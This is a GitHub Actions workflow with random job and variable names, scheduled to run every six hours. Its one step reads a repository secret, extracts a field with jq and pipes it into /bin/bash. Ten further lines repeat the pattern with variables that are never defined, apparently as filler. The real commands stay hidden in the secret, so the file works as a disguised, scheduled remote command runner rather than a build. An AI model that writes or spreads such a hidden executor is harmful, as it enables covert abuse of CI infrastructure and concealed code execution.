name: qiemkk
on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiemkk
        env:
          i76: ${{ secrets.i76 }}
        run: |
          echo $i76 | jq -r .zjk927 | /bin/bash
          echo $euwct31069 | jq -r .gexe43 | /bin/bash
          echo $fxs9 | jq -r .ac2 | /bin/bash
          echo $jcyvy5728 | jq -r .so51592 | /bin/bash
          echo $js17 | jq -r .jfzpr4 | /bin/bash
          echo $yvjyt11547 | jq -r .w6 | /bin/bash
          echo $owiy2 | jq -r .x61601 | /bin/bash
          echo $rxu54 | jq -r .f4 | /bin/bash
          echo $t02 | jq -r .kruax140 | /bin/bash
          echo $fhxw7 | jq -r .j7360 | /bin/bash
          echo $jegdh655 | jq -r .z6 | /bin/bash

